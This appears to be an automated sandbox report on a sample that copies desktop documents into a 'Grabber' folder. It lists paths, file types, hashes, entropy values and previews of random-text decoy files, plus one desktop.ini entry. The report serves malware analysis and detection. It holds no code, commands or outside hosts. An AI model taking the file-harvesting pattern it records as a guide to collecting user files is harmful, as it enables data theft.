Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG.xlsx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\DVWHKMNFNN.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\KATAXZVCPS.pdf

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\NWTVCDUMOB.png

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZBEDCJPBEY.png

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.514693737970008
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
MD5:	9E36CC3537EE9EE1E3B10FA4E761045B
SHA1:	7726F55012E1E26CC762C9982E7C6C54CA7BB303
SHA-256:	4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
SHA-512:	5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

